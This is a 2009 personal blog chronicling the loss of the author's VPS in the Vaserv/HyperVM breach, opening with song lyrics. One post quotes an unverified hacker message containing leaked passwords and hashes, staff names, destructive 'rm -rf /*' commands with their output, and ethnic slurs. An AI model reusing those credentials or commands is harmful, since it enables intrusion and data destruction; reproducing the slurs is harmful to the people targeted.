What about sunrise?
What about rain?
What about all the things,
That you said we were to gain?
What about killing fields?
Is there a time?
What about all the things,
That you said was yours and mine?
Did you ever stop to notice,
All the blood we've shed before?
Did you ever stop to notice,
The crying Earth the weeping shores?
Aah............... Oo...........
Aah............... Oo...........
What have we done to the world?
Look what we've done.
What about all the peace,
That you pledge your only son?
What about flowering fields?
Is there a time?
What about all the dreams,
That you said was yours and mine?
Did you ever stop to notice,
All the children dead from war?
Did you ever stop to notice,
The crying Earth the weeping shores?
Aah............... Oo...........
Aah............... Oo...........
I used to dream.
I used to glance beyond the stars.
Now I don't know where we are.
Although I know we've drifted far.
Aah............... Oo...........
Aah............... Oo...........
Aah............... Oo...........
Aah............... Oo...........
Hey-yea!
What about yesterday?
What about the seas?
The heavens are falling down.
I can't even breathe!
What about apathy?
I can feel its wounds.
What about nature's worth?
It's our planet's womb!
What about animals?
We've turned kingdoms to dust,
What about elephants?
Have we lost their trust?
What about crying whales?
Ravaging the seas.
What about forest trails?
Burnt despite our pleas!
What about the holy land?
Torn apart by creed.
What about the common man?
Can't we set him free?
What about children dying?
Can't you hear them cry?
Where did we go wrong?
Someone tell me why!
What about baby boy?
What about the days?
What about all their joy?
What about the man?
What about the crying man?
What about Abraham?
What about death again?
Do we give a damn?!
Friday, June 26, 2009
In memory of Michael
Saturday, June 13, 2009
Connecting to the Matrix
Today I start to configure my VPS.
I connect to it via SSH with putty. I only will see white text on a black window, and I will type Linux commands and cofiguration settings all day. Soon, I will not be able to know which is the real world. So dangerous!
Whether, will I be able to connect out from there in the end of the day? Whether, will The VPS has me? Should I follow the white rabbit?
My one chance there is no Windows on my VPS.
Read more
I connect to it via SSH with putty. I only will see white text on a black window, and I will type Linux commands and cofiguration settings all day. Soon, I will not be able to know which is the real world. So dangerous!
Whether, will I be able to connect out from there in the end of the day? Whether, will The VPS has me? Should I follow the white rabbit?
My one chance there is no Windows on my VPS.
Friday, June 12, 2009
Where is my VPS located?
I wanted that my new VPS stay in US, and I was afraid it will be moved to UK.
But no, my new VPS is located in US, Los Angeles at OC-3Networks.
I pinged my VPS from multiple locations on just-ping.com
Here is a screenshot of the ping results.
My new VPS has been arrived!!!
A few hours ago my new VPS has been arrived.
First with a CentOS, but because I am not familiar with CentOS, I requested a Debian 5 template.
After 20 minutes there was Debian on my VPS.
Unfortunately it is full with such packages what I will never use, but the support team told me this is the only image they have and can provision.
Anyway, my new VPS is up and running!
Read more
First with a CentOS, but because I am not familiar with CentOS, I requested a Debian 5 template.
After 20 minutes there was Debian on my VPS.
Unfortunately it is full with such packages what I will never use, but the support team told me this is the only image they have and can provision.
Anyway, my new VPS is up and running!
Thursday, June 11, 2009
The Day That Never Comes
Long hours without any news regarding my new VPS.
Perhaps the Vaserv's staff is hearing this Metallica song. :)
Read more
Perhaps the Vaserv's staff is hearing this Metallica song. :)
A transcript of the hackers message?
I found a message on a website. It looks like a transcript of the hackers message:
Is it true or not?
If it is true then the whole story is in a new perspective now. Did the hackers only sniffed Rus's password?
And did the hackers got root access to the whole Vaserv's empire with this one username/password pair?
Hmmm....
What do you think?
Read more
"Z3r0 day in hypervm?? plz u give us too much credit. If you really really wanna know how you got wtfpwned bitch it was ur own stupidity and excessive passwd reuse. Rus's passwds are
Code:
e2x2%sin0ei unf1shf4rt 3^%3df 1/2=%mod5 f0ster
f0ster being the latest one, quite secure eh bitches? We were in ur networks sniffing ur passwds for the past two months quite funny this openvz crap is we could just get into any VPS we like at any time thanks to ur mad passwds. But we got bored so we decided to initiate operation rmfication and hypervm was a great t00l to do that since it spared us the time of sshing into all ur 200 boxen just to issue rm -rf. Coded a little .pl to do just that, take a look at this eleet output it's mad dawg
Code:
[root@vz-vaserv .ssh]# perl h.pl -user admin -pass ****off -host cp.vaserv.com -cmd 'rm -rf /* 2> /dev/null > /dev/null &'
[+] Attempting to login using admin / ****off
[+] Logged in, showtime!
Output for 67.222.156.106
Output for xen3ws.vaserv.com
Output for vz22uk.vaserv.com
Output for xen4ws.vaserv.com
Output for vzspecial5.vaserv.com
Output for xen16.vaserv.com
Output for vz77uk.vaserv.com
Output for 91.186.26.128
Output for xen25.vaserv.com
Output for vz76uk.vaserv.com
Output for vz18tx.vaserv.com
Output for vz75uk.vaserv.com
Output for vz45uk.vaserv.com
Output for vzpent16.vaserv.com
Output for xen1tx.vaserv.com
Output for vz13tx.vaserv.com
Output for vz74uk.vaserv.com
Output for vzspecial8.vaserv.com
Output for xen24.vaserv.com
Output for vz73uk.vaserv.com
Output for rdns1.vaserv.com
Output for vz2tx.vaserv.com
Output for vz17tx.vaserv.com
Output for xen23.vaserv.com
Output for vz72uk.vaserv.com
Output for xen22.vaserv.com
Output for vzruffbuff.vaserv.com
Output for vzmario.vaserv.com
Output for xen21.vaserv.com
Output for vz71uk.vaserv.com
Output for vzspecial7.vaserv.com
Output for vz70uk.vaserv.com
Output for xen20.vaserv.com
Output for vz69uk.vaserv.com
Output for vzspecial6.vaserv.com
Output for vz7uk.vaserv.com
Output for vzspecial4.vaserv.com
Output for vzspecial3.vaserv.com
Output for xen19.vaserv.com
Output for vzspecial2.vaserv.com
Output for vzspecial1.vaserv.com
Output for vzpent3.vaserv.com
output truncated due to massive boxen outputz
[root@vz-vaserv .ssh]# rm -rf /* > /dev/null 2> /dev/null &
[1] 12399
[root@vz-vaserv .ssh]#
Did the same fo ****vps.com after resetting the passwd to hyper ve emz, it was ever so much fun you should try it sometime Rus it's GREAT!
BTW to all the customers we deleted ur loving provider is overselling their crappy 8gb nodez to hell and back, thought you'd like to know, you can also thank ur loving buddy Rus for losing ur data hihi. BTW Rus we still have ur billing system wtfpwned and baqdoored we got shitload of CCz from ur retarded customers thanks a lot buddy. Telling you this cuz we got bored of this ****, it's just too easy and monotonous so patch ur crap, if your too dumb to secure a simple web server my rate is $100/hour or one night with ur sister hauhaiahiaha.
Also wheres ur team Rus? the only ****ers i saw in ur billing sys are Kody, Vlada and u you guys work like ****ing hindus i bet but ur cheap like jews lolz hire some pros like me to help you out manage all those retards VPSs lolololl
Code:
1 1 rghf c32f3310baffcb431875a67196e99ebd Rus F zswlxxoomx@nowmymail.com 0 ,
Edit Delete 3 1 vlada c32f3310baffcb431875a67196e99ebd Vlada Neskovic zswlxxoomx@nowmymail.com 0 ,
Edit Delete 4 1 Kody fde67637d867c52d739931528dd92ef0 Kody Riker zswlxxoomx@nowmymail.com Georgia - server22 space 1slot 1gb 0 ,
See we care about ur privacy and edited ur emailz unlike you who do not care about the privacy of ur retarded customers lol
Code:
Showing rows 0 - 29 (1,361 total, Query took 0.0133 sec)
SELECT *
FROM `tblclients`
LIMIT 0 , 30
Fun stuff think we gonna sell all those emails to some spammers to make some quick bucks lol, and yes their main site was a VPS lolol which is why we got quick access thanks to ur passwd reuse, your awesome Rus.
Yea yea "his IP is:64.79.210.78" here i saved u the trouble lolol
Code:
-bash-3.2# ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:16271 errors:0 dropped:0 overruns:0 frame:0
TX packets:16271 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1114930 (1.0 MiB) TX bytes:1114930 (1.0 MiB)
venet0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:127.0.0.1 P-t-P:127.0.0.1 Bcast:0.0.0.0 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
RX packets:33396 errors:0 dropped:0 overruns:0 frame:0
TX packets:34122 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4462516 (4.2 MiB) TX bytes:11170841 (10.6 MiB)
venet0:0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:64.79.210.78 P-t-P:64.79.210.78 Bcast:64.79.210.78 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
venet0:1 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:64.79.206.197 P-t-P:64.79.206.197 Bcast:64.79.206.197 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
venet0:2 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:67.223.225.52 P-t-P:67.223.225.52 Bcast:67.223.225.52 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
-bash-3.2# rm -rf /* 2> /dev/null > /dev/null * &
[1] 7643
-bash-3.2#
I love to rm lol bye
~Thedefaced.org"
Is it true or not?
If it is true then the whole story is in a new perspective now. Did the hackers only sniffed Rus's password?
And did the hackers got root access to the whole Vaserv's empire with this one username/password pair?
Hmmm....
What do you think?
On the 4th day
Today is the fourth day after the hacker attack and my VPS is still offline.
There is no any news about my new VPS. How long do I have to wait for it?
Read more
There is no any news about my new VPS. How long do I have to wait for it?
Wednesday, June 10, 2009
My VPS rebuild request has been acknowledged
I received a short message from FSCKVPS:
"Rebuild Request Acknowledged."
Now I could shout wooow, yeeaah, suuupeeer, but I just quitly ask when will be my vps online?
And I am hearing a sad Slipknot song, Vermillion Pt.2
Read more
"Rebuild Request Acknowledged."
Now I could shout wooow, yeeaah, suuupeeer, but I just quitly ask when will be my vps online?
And I am hearing a sad Slipknot song, Vermillion Pt.2
Good Bye US datacentre?
Quote from Vaserve status page:
My VPS was in an US datacentre Dallas, Texas. Hmmm....I dont know, what should I do now. My visitors come from US mainly, perhaps I should look for another VPS provider.
Read more
"Q:I ordered a server in the US, so why has it been provisioned in the UK?
A:Due to the hardware we were using in the US, we have taken advantage of the new servers afforded to us by BlueSquare which are of a much superior quality and redundancy level. We were also able to setup the servers quicker in the UK than the US due to the ‘staff on the ground’ at the datacentre in the UK."
My VPS was in an US datacentre Dallas, Texas. Hmmm....I dont know, what should I do now. My visitors come from US mainly, perhaps I should look for another VPS provider.
Vaserve acquired by BlueSquare
"Dear VaServ customer,
As I am sure you are aware due to a combination of issues a large number of VPS nodes were compromised by a third party, which has resulted in some customers suffering a data loss.
Vaserv’s UK operations have been based at the BlueSquare Data Centre for a number of years, and we have a very strong working relationship with Rus Foster and his team. Once Rus made us aware of the major issues that his company was facing, we quickly mobilised a number of our experienced Linux engineers to help with the restore and rebuild of the VPS platform. Our engineers, along with vaserv staff have been working on these issues for well over 24 hours now, and we are starting to catch our tail.
We have been in dialog with Rus regarding the ongoing support of Vaserv, and it is with pleasure that I can announce BlueSquare Data Group (www.bluesquaredatagroup.com) will be taking over the operations of Vaserv in the future.
For the meantime we will continue to support vaserv and Rus wherever we can, and some customers are already being moving onto our own BlueSquare infrastructure.
Our short term aim is to get as many customers back up as soon as possible, as well as providing customers who have suffered a data loss a new VPS on the BlueSquare platform.
Our long term aim will be to move all the current VAServ customers onto the new BlueSquare Linux VPS platform, which has been in development for a number of months, and boasts industry leading security and reliability, along with the speed and uptime you would expect from VAserv.
We look forward to working with Rus and his team, and are excited about the opportunities this brings for you as a customer, providing exactly what you have been used to, but on a even better hardware and software platform. We have no intentions to change customer pricing.
Please continue to liaise with Rus and his team during these difficult times (as we don’t have any access to the day-to-day tech support of VAserv). We will continue to assist with infrastructure in the meantime, and will be in further contact once the majority of the recent issues have been resolved.
Thank you for your continued support,
Best Regards,"
The story on Slashdot
The story publicated on Slashdot:
More on Slashdot
Read more
"The discovery of 24 security vulnerabilities may have contributed to the death of the chief of LxLabs. A flaw in the company's HyperVM software allowed data on 100,000 sites, all hosted by VAserv, to be destroyed. The HyperVM solution is popular with cheap web hosting services and the attacks are easy to reproduce, which could lead to further incidents."
More on Slashdot
Lxlabs/HyperVM owner, K T Ligesh hanged himself!?
A tragical news has been publicated on several news portal on the internet:
Lxlabs/HyperVM owner K T Ligesh hanged himself.
You can read the news here , here and here .
And also several forum topics has been started about his suicide on Webhostingtalk and Lxlabs forum
The HyperVM control panel is used at FSCKVPS and at the whole Vaserv empire (and at lots of other VPS providers) for managing of the virtual private servers.
And possible, the hacker(s) exploited the HperVM's security hole for this attack.
I don't know whether the news about his suicide is true or not, but how long will this hacker story continue?
Sad and tragical
Read more
Lxlabs/HyperVM owner K T Ligesh hanged himself.
You can read the news here , here and here .
And also several forum topics has been started about his suicide on Webhostingtalk and Lxlabs forum
The HyperVM control panel is used at FSCKVPS and at the whole Vaserv empire (and at lots of other VPS providers) for managing of the virtual private servers.
And possible, the hacker(s) exploited the HperVM's security hole for this attack.
I don't know whether the news about his suicide is true or not, but how long will this hacker story continue?
Sad and tragical
I moved the DNS of laszlo.molnar.name
New VPS has been requested
I requested a new vps from FSCKVPS a few hours ago. Because I am the one of lots of unluc
ky guys who has 100% data loss on their vps. It seems I am not pessimist, but realist.
Now I am sitting back and waiting for the new vps,
but my hand is on my colt. :)
Read more
ky guys who has 100% data loss on their vps. It seems I am not pessimist, but realist.Now I am sitting back and waiting for the new vps,
but my hand is on my colt. :)
Tuesday, June 9, 2009
Bang Bang
FSCKVPS (they are part of Vaserv) post the following message on their status page:
Bang Bang
Read more
"Dear Customer,
We have worked tirelessly through the night and over the last 48 hours to recover as many VPS as possible. However, we have now reached the end of all of our servers, and as such, if your server is not currently up, or not partly up (i.e. it is up but not working due to a configuration issue) then it is unfortunate that you will have lost your data due to this third party attack.
We are offering all customers who have lost data a brand new VPS on our new platform. If you are in the position of requiring a new VPS due to your old one not coming back up, please submit a support ticket with the subject ‘New VPS Required’, and including the specification you ordered in the message. We will then start to provision these straight away. We will aim to have all new servers up within 6 hours at the latest, of course providing no new issues occur. If you have your own backups you can then restore these onto the new VPS.
We will also be providing two months free hosting as compensation to customers that have lost data and require a new VPS.
We apologise for any inconvenience caused, and your patience and understanding in these very difficult times.
Regards, VAServ Team."
Bang Bang
Redirecting issues 2
Oh God, the redirection was only partly successful. Only my websites'frontpages have been redirected to this blog main page, but my subpages have 404 error under this blog's domain.
Well, I stop thinking about redirection and I am waiting for FSCKVPS's actions.
Till the next news let's hear a System of a Down song.
Read more
Well, I stop thinking about redirection and I am waiting for FSCKVPS's actions.
Till the next news let's hear a System of a Down song.
Redirecting issues 1
I successfully redirect all my websites to this blog excluding http://www.laszlo.molnar.name
All my other domains' DNS are at name.com, but laszlo.molnar.name's DNS is at freeyourid.com
I don't understand what is freeyourid.com doing across long hours, redirecting procedure was 10 seconds at name.com
Read more
All my other domains' DNS are at name.com, but laszlo.molnar.name's DNS is at freeyourid.com
I don't understand what is freeyourid.com doing across long hours, redirecting procedure was 10 seconds at name.com
The Attack
A large internet service provider said data for as many as 100,000 websites was destroyed by attackers who targeted a zero-day vulnerability in a widely-used virtualization application.
Technicians at UK-based Vaserv.com were still scrambling to recover data on Monday evening UK time, more than 24 hours after unknown hackers were able to gain root access to the company's system, Rus Foster, the company's director told The Register. He said the attackers were able to penetrate his servers by exploiting a critical vulnerability in HyperVM, a virtualization application made by a company called LXLabs.
"We were hit by a zero-day exploit" in version 2.0.7992 of the application, he said. "I've heard from other people they've been hit by the same thing."
Foster said he's been unable to reach anyone at LXLabs to discuss the suspected vulnerability.
More on The Register
Read more
Technicians at UK-based Vaserv.com were still scrambling to recover data on Monday evening UK time, more than 24 hours after unknown hackers were able to gain root access to the company's system, Rus Foster, the company's director told The Register. He said the attackers were able to penetrate his servers by exploiting a critical vulnerability in HyperVM, a virtualization application made by a company called LXLabs.
"We were hit by a zero-day exploit" in version 2.0.7992 of the application, he said. "I've heard from other people they've been hit by the same thing."
Foster said he's been unable to reach anyone at LXLabs to discuss the suspected vulnerability.
More on The Register
My websites are offline
Dear Visitor, Reader, Member of my following websites:
http://www.laszlomolnar.name - it is up again!
http://www.laszlo.molnar.name - it is up again! (redirected to http://www.laszlomolnar.name)
http://www.b21club.com - it is up again!
http://www.languagejuice.com - it is up again!
http://www.osboom.com - parked on Sedo
http://www.jammmer.com - parked on Sedo
http://www.wifisoftwares.com - it is up again!
Two days ago my virtual server provider, fsckvps.com had been hacked.
You can read a very long forum thread about this attack and the chaos here
So all of my websites/webprojetcs went offline, and they are still offline today.
I hope FSCKVPS's staff is working hard and fast and they will restore my vps asap.
But it is only a hope. I am so pessimist, I think my datas will not be restored.
And I will have to reconfig my vps and rebuild my websites/webprojects.
Not a nice future vision.
Because I don't know when will be my vps/websites online again now I redirect temporarily all of my websites to this blog and I will inform you about my vps/websites issues here.
I post this first blog entry with date of 2020 (edited! - back to 2009), because I want it to the top of my blog. If you want to read the full story, start here please.
Read more
http://www.laszlomolnar.name - it is up again!
http://www.laszlo.molnar.name - it is up again! (redirected to http://www.laszlomolnar.name)
http://www.b21club.com - it is up again!
http://www.languagejuice.com - it is up again!
http://www.osboom.com - parked on Sedo
http://www.jammmer.com - parked on Sedo
http://www.wifisoftwares.com - it is up again!
Two days ago my virtual server provider, fsckvps.com had been hacked.
You can read a very long forum thread about this attack and the chaos here
So all of my websites/webprojetcs went offline, and they are still offline today.
I hope FSCKVPS's staff is working hard and fast and they will restore my vps asap.
But it is only a hope. I am so pessimist, I think my datas will not be restored.
And I will have to reconfig my vps and rebuild my websites/webprojects.
Not a nice future vision.
Because I don't know when will be my vps/websites online again now I redirect temporarily all of my websites to this blog and I will inform you about my vps/websites issues here.
I post this first blog entry with date of 2020 (edited! - back to 2009), because I want it to the top of my blog. If you want to read the full story, start here please.
Monday, June 1, 2009
Privacy Policy
404 takes your privacy seriously. This privacy policy describes what personal information we collect and how we use it.
Advertising partners and other third parties may also use cookies, scripts and/or web beacons to track visitors to our site in order to display advertisements and other useful information. Such tracking is done directly by the third parties through their own servers and is subject to their own privacy policies.
Routine Information Collection
All web servers track basic information about their visitors. This information includes, but is not limited to, IP addresses, browser details, timestamps and referring pages. None of this information can personally identify specific visitors to this site. The information is tracked for routine administration and maintenance purposes.Cookies and Web Beacons
Where necessary, 404 uses cookies to store information about a visitor's preferences and history in order to better serve the visitor and/or present the visitor with customized content.Advertising partners and other third parties may also use cookies, scripts and/or web beacons to track visitors to our site in order to display advertisements and other useful information. Such tracking is done directly by the third parties through their own servers and is subject to their own privacy policies.
Controlling Your Privacy
Note that you can change your browser settings to disable cookies if you have privacy concerns. Disabling cookies for all sites is not recommended as it may interfere with your use of some sites. The best option is to disable or enable cookies on a per-site basis. Consult your browser documentation for instructions on how to block cookies and other tracking mechanisms.Special Note About Google Advertising
Any advertisements served by Google, Inc., and affiliated companies may be controlled using cookies. These cookies allow Google to display ads based on your visits to this site and other sites that use Google advertising services. Learn how to opt out of Google's cookie usage. As mentioned above, any tracking done by Google through cookies and other mechanisms is subject to Google's own privacy policies.Contact Information
Concerns or questions about this privacy policy can be directed via this contact form for further clarification.
Subscribe to:
Posts (Atom)